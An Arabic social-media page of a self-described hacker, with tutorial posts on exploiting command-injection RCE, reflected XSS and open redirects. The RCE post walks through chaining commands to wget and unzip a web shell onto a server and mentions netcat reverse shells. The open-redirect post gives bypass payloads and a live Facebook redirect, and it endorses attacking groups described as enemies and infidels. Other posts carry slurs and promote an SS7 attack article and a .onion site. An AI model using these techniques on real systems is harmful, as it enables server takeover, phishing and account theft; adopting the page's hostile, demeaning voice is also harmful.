VIRUS-X-001

VIRUS-X-001 ▇◤▔▔▔▔▔▔▔◥▇
▇▏◥▇◣┊◢▇◤▕▇
▇▏▃▆▅▎▅▆▃▕▇
▇▏╱▔▕▎▔▔╲▕▇
▇◣◣▃▅▎▅▃◢◢▇
▇▇◣◥▅▅▅◤◢▇▇
▇▇▇◣╲▇╱◢▇▇▇
▇▇▇▇◣▇◢▇▇▇▇
(2)

مرحبا، اسمي VIRUS-X-001
متخصص في امن سيبراني و في البرمجة و اتقن العديد من لغات البرمجية و دارس شبكات و الكثير من المجلات المتخصصة في التكنلوجية التي اعرفها و هذي صفحتي اقدم فيها محتوى تعليمي و اشارك فيها خبرتي في المجال

شرح ثغرات Remote Command Ex*****on اختصرها (RCE) :-• هذه الثغرات بكل بساطة تمكننا من كتابة اوامر ((linux)) اي اوامر نظ...
18/04/2024

شرح ثغرات Remote Command Ex*****on اختصرها (RCE) :-

• هذه الثغرات بكل بساطة تمكننا من كتابة اوامر ((linux)) اي اوامر نظام لينكس وهذه الاوامر تسمح لنا بتنفذي اي امر على السيرفر الخاص بالموقع بالاصح التحكم بالسيرفر حسب صلحياتك عليه مثلا امر اظهار ملفات الموقع dir او ls او اضهار صلاحيتك عبر الامر id .. وغيرها من اومر لينكس التي تستعملها في الترمينال مثلا في kali linux وغيرها.. الخ
• شرح كيف تكون الثغرة:-
هذا الكود المصاب بهذه الثغرة:-
# # #

# # #
•شرح الكود:- يستقبل البرنامج قيمة من المستخدم عبر الـــ GET request و بعدها يقوم بتنفيذها بدون التحقق من صحة البينات..
•وهذا شكل عنوان الـ url المصاب:-
# # #
https://www.example.com/index.php?cmd=commande
# # #
• شرح عنوان url عبارة عن ملف في الموقع اسمه index و امتداده php. و يحتوي على حقل id. ومتغير بأسم commande
• طريقة أستغلال الثغرة:-
بدال commande نضع اوامر لينكس اذا كان السيرفر لينكس...
مثلا اذا اردنا ان نعرف مكاننا على السيرفر او المسار الذي نحن متواجدون عليه بالامر pwd:-
الـ(URL):-
# # #
https://www.example.com/index.php?cmd=pwd
# # #
ثم نرى الملفات وتصاريحها بالامر ls -la وعندما تجد مجلد له تصريح 777 مثلا المجلد data فيه تصريح 777 تقوم مباشرة بدخول للمجلد بالامر cd ونقوم برفع الشل عليه بالامر wget:-
• مثلا هكذا: الامر:-
# # #
cd home/domains/www.example.com/public_html/vb/data;wget http://www.example.com/shell.zip
# # #
• شرح الامر:- قمنا اول بكتابة الامر cd home/domains/www.example.com/public_html/vb/data حتى ننتقل الى المسار data وبعدها; تعني فصل بين الاوامر و تسمح لنا بتنفيذ اكثر من امر في امر وحد و ممكن تستخدم بدلها&& او | وغيرها... وبعدها كتبنا الامر wget http://www.example.com/shell.zip يعني تحميل الشل بصيغة zip من ذالك الرابط مثلما نقوم بتحميل الادوات على kali linux بضبط..
هنا نفذنا امرين امر الدخول للمجلد وامر رفع الشل او تحميله على السيرفر ووضعنا الامرين معا بالعلامة; و بعد التاكد من رفع الشل نقوم بفك ضغطه لاننا قمنا بتحميله بصيغة zip مضغوط نقوم بفك ضغطه بهذا الامر:-
# # #
unzip shell.zip
# # #
• بمجرد فك الضغط عليه نقوم بكتابة الامر pwd. لمعرفة المسار الذي نحن عليه و بعدها نكتب اسم الشل و مساره بعد فك الضغط سوف يكون بصيغة php. بعدها نقوم بدخول له من الموقع عن طريق المسار الذي هو موجود عليه نقوم بوضعه بعد رابط الموقع و سوف يعمل بنجاح....

• ايضا هذه الثغرة رغم انها بسيطة و سهلة جدا الى انها من اخطر الثغرات لو اكتشفتها في سيرفر يحتوي على اكثر من دومين انت تكون اخترقت كل الدومينز الموجودة عليه و ممكن تعمل اتصال عكسي على السيرفر عن طريق ادات ntcat مثلا و تفعل الكثير من الامور اذا وجدتها كما لو انك وجدت كنز ههههه و هيا ثغرة نادرة نوع ما ولا يمكن ايجدها بسهولة. المهم نهاية الشرح اتمنى ان يكون الشرح مفيد لكم و يكون مفهوم ايضا و بتوفيق....

أتعرفون ما هو الشيء الذي يجعلني اشعر بالخيبة حقا. هو عندما ارى أن البشر بصفة عامة ضعفاء جدا الى ابعد مما تتصور و حسب خبر...
15/04/2024

أتعرفون ما هو الشيء الذي يجعلني اشعر بالخيبة حقا. هو عندما ارى أن البشر بصفة عامة ضعفاء جدا الى ابعد مما تتصور و حسب خبرتي و دراستي المطولة في علم النفس و الطبيعة البشرية و خصوصا علم النفس الاسود لقد قمت بتحليل سلوكيات البشر ووجدت انهم في مبدأ عملهم مثل الكمبيوتر او النظام الذي يمكن التحكم فيه يعملون بنفس الطريقه بضبط مثلا انا هاكر عندما اريد استهداف نظام معين سوف ابدا في جلب معلومات عن ذالك النظام و بعدها أستغل تلك المعلومات في البحث عن ثغرات اكثر تمكنني من الوصول الى ذلك النظام بعد العثور على ثغرة سوف اقوم بعملية استغلال لها بحيث اخترق النظام المستهدف، حسنا حسنا فهمت الان الفكرة من عملية (جلب المعلومات-استغلالها في البحث عن الثغرات-اختراق النظام و التحكم فيه)
من خلال هذا المثال اوضح لك طريقة مبسطة او نبذة مختصرة عن اختراق نظام كمبيوتر بشكل مبسط ولاكن في نفس الوقت هذه الطريقة تعمل ايضا مع البشر مدهش صحيح. البشر دائم لديهم نقاط ضعف و نقاط الضعف هذه تكون في العقل و التفكير... و بالفعل يتم اختراق عقولكم كل يوم من دون شعور و التحكم فيها و زرع افكار و معتقدات سامة جدا في عقولكم و اصبحنا اليوم يتم التلاعب بعقولنا من خلال العديد من الاشياء مثلا مواقع التواصل الاجتماعي و كيف تدمر عقلك و كيف تدمن على هذه التطبيقات و تدمر دماغك بسبب الافراط في الحصول على الدوبامين و غيرها.. المهم انا هنا فقط حتى اوضح لك فكرة اختراق العقول البشرية و لا اريد التطرق الى الموضوع بشكل كبير فقط وضحت لك الفكرة. لذلك كن حذرا و قم بترقيع الثغرات التي في دماغك و لا تدع احد يجعلك تمشي على توقعاته لقد اصبحنا في عالم تغزوه الفتن و الكذب و المبيقات التعري و الغباء و التفاهة... اقترب يوم القيامة علينا و لم يبقى شيء لذلك اتبعو سيرة و سنة الرسول ﷺ و كتاب الله القرآن هذا هو المهرب الوحيد اما الجري خلف الحياة الدنيا لن يفيدكم في شيء سوى مضيعة للوقت...

عيد مبارك و كل عام و انتم بخير🌹🥀أحبائي الأعزاءأتقدم بأحر التهاني وأطيب التمنيات بمناسبة عيد الفطر المبارك أعاده الله علي...
09/04/2024

عيد مبارك و كل عام و انتم بخير🌹🥀

أحبائي الأعزاء
أتقدم بأحر التهاني وأطيب التمنيات بمناسبة عيد الفطر المبارك أعاده الله عليكم باليمن والبركات أتمنى لكم فرحاً وسلاماً في هذه المناسبة المباركة وأن يجعلها الله عيداً سعيداً عليكم وعلى عوائلكم نسأل الله أن يتقبل منا ومنكم صالح الأعمال والطاعات وأن يعيده علينا وعليكم باليمن والبركات....
كل عام وأنتم بخير!

و نتأسف لكم على الغياب كانت الصفحة مغلقة لبعض الوقت اغلقتها انا بسبب كثرة البغلاغات من طرف بني صـ(🐕)ـهيـ(🐕)ـوني (الكلاب) و ادارة فيسبوك (الق،وادي،ن)

السلام عليكم ورحمة الله وبركاته. أعزائي متابعي صفحتنا الكرام. أتمنى أن تكونوا بأتم الصحة والعافية. قد أفاجأنا جميعًا بقد...
10/03/2024

السلام عليكم ورحمة الله وبركاته.

أعزائي متابعي صفحتنا الكرام. أتمنى أن تكونوا بأتم الصحة والعافية. قد أفاجأنا جميعًا بقدوم شهر رمضان المبارك. فلنستقبله ببهجة وسعادة وقلوب مليئة بالتقوى والبركات.

أتمنى أن يحمل لكم شهر رمضان الفضيل الخيرات والمغفرة. وأن تتمتعوا بالصيام والقيام وتلاوة القرآن الكريم بتركيز وتأمل. فإن فيها راحة وقوة للروح والجسد.

لا تنسوا أهمية العطاء والإحسان في هذا الشهر الكريم. فتقديم المساعدة للمحتاجين وصدقة الفطر وإفطار الصائم يكون لهم أثراً كبيراً في تعميق المحبة والتراحم بين المسلمين.

وفي الختام. أتمنى لكم شهر رمضان مليئاً بالعبادة والتقرب إلى الله. وأن تعود عليكم جميعًا بالخير والفرح والراحة النفسية. تجدون في هذا الشهر الفضيل فرصة للتجديد والنمو الروحي.

رمضان كريم وكل عام وأنتم بخير!

ودمتم في رعاية الله وحفظه.

مع خالص التحية، VIRUS-X-001

05/03/2024
شرح ثغرة (Reflected XSS(Rxss مع كود في backend وكيف اذا حقنت Paylod كيف يتنفذ في backend و طريقة اسغلالها و الحماية منها...
01/03/2024

شرح ثغرة (Reflected XSS(Rxss مع كود في backend وكيف اذا حقنت Paylod كيف يتنفذ في backend و طريقة اسغلالها و الحماية منهابسم الله نبدا الشرح حسنا هذا كود php المصاب بالثغرة:
# #
if(isset($_Get['name'])){
$name = $_GET['name'];
echo “Hello ” . $name . “!";
}
# #
هذا الكود يقوم بفحص إذا كانت المتغير $_GET['name موجودة في الطلب الذي تم إرساله إذا كانت موجودة يتم تعيين قيمتها إلى متغير $name و طبعا هذا الكود معرض ل Reflected Cross-Site Scripting أو ما يعرف بـ RXSS لأنه يُطبع قيمة المتغير $name بدون التعامل مع الحالات التي قد تحتوي على أكواد HTML أو JavaScript ضارة عندما يُدخل المستخدم بيانات تحتوي على أكواد تنفيذية سكربت خبيثة في حقل الاسم (name) يتم عرضها.
مثال تطبيقي: سوف نفرض انك في صفحة تكتب فيها اي اسم مثلا:
# #
name: VIRUS-X-001
# #
سوف يكون بهذا الشكل في URL:
# #
https://www.example.com/hello.php?name=VIRUS-X-001
# #
و سوف يطبع لك:
# #
Hello VIRUS-X-001
# #
اذا عملت بيدج سور سوف يكون بهذا الشكل:
# #
Hello VIRUS-X-001
# #
حسنا دعونا الان ندخل في كيفية استغلال الثغرة: اول نقوم بوضع البايلود التالي في حقل ادخال الاسم
# #
alert(1)
# #
سوف يكون بهذا الشكل:
# #
name: alert(1)
# #
و يكون بشكل هذا في URL:
# #
https://www.example.com/hello.php?name=alert(1)
# # #
سوف يطبع لك alert في الصفحة برقم 1 هذا اذا كان مصاب فعلا بالثغرة
ولو سويت بيدج سورس مرة ثانية سوف يبقا بهذا بشكل
# #
Hello alert(1)!
# #
طريقة الحماية منها يجب عليك تعديل الكود ليتضمن استخدام دالة htmlspecialchars() لتحويل الأحرف الخاصة في HTML إلى أكواد مشفرة وبذلك يتم منع تنفيذ الأكواد الضارة عند عرض البيانات على صفحة الويب الكود المعدل سيكون هكذا:
# #

# #
و باستخدام htmlspecialchars() يتم تحويل الأحرف الخاصة في HTML مثل هذو , &, ", و' إلى أكواد HTML entities آمنة مما يمنع تنفيذ السكربتات الضارة

اخيرا اطلقت موقعي الجديد على dark web *_* زوزو الموقع و اخبروني طبعا التصميم ليس جيد كثيرا هو فقط وقتي و سوف استبدله في...
19/02/2024

اخيرا اطلقت موقعي الجديد على dark web *_*
زوزو الموقع و اخبروني طبعا التصميم ليس جيد كثيرا هو فقط وقتي و سوف استبدله في المستقبل :-)
و اعطوني افكاركم هل اسوي لكم فيه مجموعة دردشة او مناقشات و او اي اقتراحات اخرى اخبروني في التعليقات و شكرا 🌹 ^_~
رابط الموقع:
http://q7uwod4xqzayf5qegfh62jkd3fjk4g3i5oq7lkw5k6zdiydxu7mzboqd.onion/

استخدم tor browse لدخول ^_^

مرحبا منذ مدة طوليلة اكتشفت ثغرة على facebook و هذه الثغرة اسمها Open Redirect Vulnerableity او Open URL Redirectionو خ...
15/02/2024

مرحبا منذ مدة طوليلة اكتشفت ثغرة على facebook و هذه الثغرة اسمها Open Redirect Vulnerableity او Open URL Redirection

و خطورة هذه الثغرة انها تستهدف المستخمين و لا تسهدف الموقع نفسو
و شرح هذه الثغرة انها تسمحلك انك تسوي Redirect لـ usr من موقع الى موقع ثاني و احينا يكون الموقع الثاني ممكن يكون فيه malwer او script يسرق معلومات من الـ browse الخاص بيك او صفحة تصييد احتيالي او صفحة مزورة و اجينا الشيء الجميل فيها انها تكون بالعادة في الـ domain الاساسي.
مثلا: شخص لو كان يريد ان يرى ان هذا الـ domain احيالي او ايا كان رح يتأكد من
اسم الدومين يلي هو
facebook.com
او برتكول الشفير
https or http
ولاكن لا يعرف انو هناك برماتر ثاني مثل هذا
https://www.facebook.com/url=attack.com
رح يسوي Redirect او اعادة توجيه الى موقع ثاني
و هذو مجموعة برماتر ممكن من تعرف من خلالها انو الموقع بالفعل مصاب بهاذي الثغرة.

1. http://example.com/redirect.php?url=//malicious.example.com
2. http://example.com/redirect.php?url=javascript:alert('Vulnerable')
3. http://example.com/redirect.php?url=\malicious.example.com
4. http://example.com/redirect.php?url=..malicious.example.com
5. http://example.com/redirect.php?url=⍟malicious.example.com
في هذي الروابط يتم استخدام محدد ur" لتحديد الوجهة المطلوبة للتوجيه.و احينا تكون عليها حماية مثلا ف يمكن تخطيها ب العديد من Payload مثلا اضافة / او //// قبل عنوان ال url مثل يلي في المثال 3 و 4 و هناك العديد من Payload.
و هذا البرماتر المصاب في فيسبوك
https://l.facebook.com/l.php?u=
ممكن مثلا الى موقعي
https://l.facebook.com/l.php?u=https://virusx001.wordpress.com/
و. عندما تدخل انت سوف هذا الرابط تضن انك دخلت الى ربط في ليسبوك عادي لاكن يوجهك الى موقعي مباشرة

تحذير: لا تستعملو هذي الثغرة في ايذاء الابرياء و سرقة حسباتهم اسعملوها في ضرب كيان الصوص اللعين او ضرب الكفارين فقط.

المهم لا تنسو التفاعل و مشاركة المنشور و دمتم في رعاية الله و حفضه.

مساء الخير للجميع بعد غياب طويل لم ننشر منذ مدة اي شيء على جميع مواقع التواصل سواء صفحتنا او على قنتنا على التليجرام لهذ...
14/02/2024

مساء الخير للجميع بعد غياب طويل لم ننشر منذ مدة اي شيء على جميع مواقع التواصل سواء صفحتنا او على قنتنا على التليجرام لهذا لقد نشرت لكم مقالة جديدة بعنوان. استكشاف نقاط الضعف الكامنة في تقنية SS7 باستخدام SigPloit هذه المقالة عن هجمة SS7.و كيفية القيام بها المهم تابعو المقالة بنفسكم.

هذا ربط المقالة على موقعنا الرسمي :

https://virusx001.wordpress.com/2024/02/14/exploring-the-inherent-vulnerabilities-in-ss7-technology-using-sigploit/

لا تنسو المشاركة🌹

Address

Yekaterinburg

Website

,

Alerts

Be the first to know and let us send you an email when VIRUS-X-001 posts news and promotions. Your email address will not be used for any other purpose, and you can unsubscribe at any time.

Shortcuts

Share

Category